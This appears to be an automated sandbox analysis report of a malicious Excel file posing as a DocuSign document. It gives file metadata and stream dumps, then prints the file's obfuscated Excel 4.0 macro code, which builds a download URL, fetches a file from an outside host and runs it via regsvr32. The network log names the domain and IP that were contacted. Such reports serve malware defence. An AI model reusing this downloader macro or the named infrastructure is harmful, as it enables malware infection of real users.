                                            SHA512:11d9597b2cbb48b03208a38d25787b5948089fe64481c7049d2f90b748797ac9532eea267fcc6eca65db92cf4ceb46f9dd8eb192296cea0addde8dcc54fc14b8
                                            SSDEEP:6144:WcKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpT3:7izo8RnsIROnr6n75YD
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea286a4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "document-1411290183.xls"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Excel
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:True
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1251
                                            Author:
                                            Last Saved By:
                                            Create Time:2006-09-16 00:00:00
                                            Last Saved Time:2020-11-26 09:47:56
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Document Code Page:1251
                                            Thumbnail Scaling Desired:False
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams

                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.367004077607
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.246848689361
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . x 7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 327615
                                            General
                                            Stream Path:Workbook
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Stream Size:327615
                                            Entropy:7.64857931295
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                            Macro 4.0 Code

                                            CALL("Ke"&????2!HY314&"32", "Cr"&????2!IA342&"yA", "JCJ", ????2!HP312&????2!HP327, 0)
                                            
                                            CALL("U"&????2!IA332, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HP312&????2!HP327&????2!HP341, 0, 0)
                                            
                                            =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312&????2!HP327,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                            "=CALL(""Ke""&????2!HY314&""32"",""Cr""&????2!IA342&""yA"",""JCJ"",????2!HP312,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                            "=CALL(""U""&????2!IA332,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HP312&????2!HP327&????2!HP341,0,0)"=EXEC(????3!W36&????2!HP312&????2!HP327&????2!HP341)=HALT()

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 03:59:50.529962063 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:50.550888062 CET4434916778.46.235.88192.168.2.22
                                            Nov 29, 2020 03:59:50.550983906 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:50.561677933 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:50.858062983 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:51.466787100 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:52.668092966 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:53.884972095 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:55.086312056 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 03:59:57.488956928 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 04:00:02.293981075 CET49167443192.168.2.2278.46.235.88
                                            Nov 29, 2020 04:00:11.904639006 CET49167443192.168.2.2278.46.235.88

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 03:59:50.448774099 CET5219753192.168.2.228.8.8.8
                                            Nov 29, 2020 03:59:50.507612944 CET53521978.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 29, 2020 03:59:50.448774099 CET192.168.2.228.8.8.80xed69Standard query (0)dtmh.grA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 29, 2020 03:59:50.507612944 CET8.8.8.8192.168.2.220xed69No error (0)dtmh.gr78.46.235.88A (IP address)IN (0x0001)

                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:03:59:40
                                            Start date:29/11/2020
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                            Imagebase:0x13fb60000
                                            File size:27641504 bytes
                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:04:00:04
                                            Start date:29/11/2020
                                            Path:C:\Windows\System32\regsvr32.exe
                                            Wow64 process (32bit):false
                                            Commandline:regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
                                            Imagebase:0xffd00000
                                            File size:19456 bytes
                                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                            Reset < >